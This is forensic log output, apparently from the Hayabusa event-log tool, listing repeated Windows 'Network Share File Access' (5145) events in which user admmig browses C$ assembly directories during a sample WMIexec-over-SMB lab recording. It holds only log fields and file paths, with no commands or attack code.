2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management.Resources\1.0.0.0_en_31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Runtime | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Runtime\1.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\MMCEx | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\MMCEx\3.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\MMCEx.Resources | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\MMCEx.Resources\3.0.0.0_en_31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\MMCFxCommon | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\MMCFxCommon\3.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\MMCFxCommon.Resources | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\MMCFxCommon.Resources\3.0.0.0_en_31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\System.Management.Automation | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\System.Management.Automation.Resources | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\System.Management.Automation.Resources\1.0.0.0_en_31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.557 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Accessibility | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.557 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Accessibility\9c87f327866f53aec68d4fee40cde33d | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.557 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\AuditPolicy42d3d2cc# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.557 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\AuditPolicy42d3d2cc#\93e4ea0bbfb41ae7167324a500662ee0 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.573 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\ComSvcConfig | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.573 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\ComSvcConfig\b22b9bfb4d9b4b757313165d12acc1b1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.573 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\CustomMarshalers | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.573 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\CustomMarshalers\3028a8133b93784c0a419f1f6eecb9d7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\dfsvc | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\dfsvc\caea217214b52a2ebc7f9e29f0594502 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\EmbeddedLockdown | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\EmbeddedLockdown\d890cdf716b288803af7c42951821885 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\EventViewer | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\EventViewer\508676af4bc32c6cdfa35cb048209b2a | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\ipamapi | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\ipamapi\893f9edeb6b037571dca67c05fad882e | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.A3ec156ec# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.A3ec156ec#\b8fd553238ff003621c581b8a7ab9311 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.604 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.A26c32abb# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.604 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.A26c32abb#\f51b67a5b93d62c5a6b657ebfd8cdaea | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.604 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Abf69f55a# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Abf69f55a#\077014d070d56db90f9a00099da60fa8 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B22c61a69# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B22c61a69#\a8aada24560f515d50d1227a4edb9a68 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B46c55d17# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B46c55d17#\a3f0de129553f858134a0e204ddf44c3 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.642 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B83e9cb53# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.642 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B83e9cb53#\b2eb2f250605eb6b697ed75a050e9fa1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B3325a29b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B3325a29b#\2d63d4f586d1192cb1d550c159a42729 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Baa2ca56b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Baa2ca56b#\71d44db8d855f43bafe707aabf0050d7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Bfc9dc24d# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Bfc9dc24d#\d33525eb35c4aa8b45b1e60e144e50ab | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.683 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Build | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.683 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Build\d6c8ca8dfe9cd143210459e72a546bf8 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.683 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C8d726d22# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.683 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C8d726d22#\95eb335a0d6884a4b311ce7041f71bc3 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.699 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C25dcfcb8# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
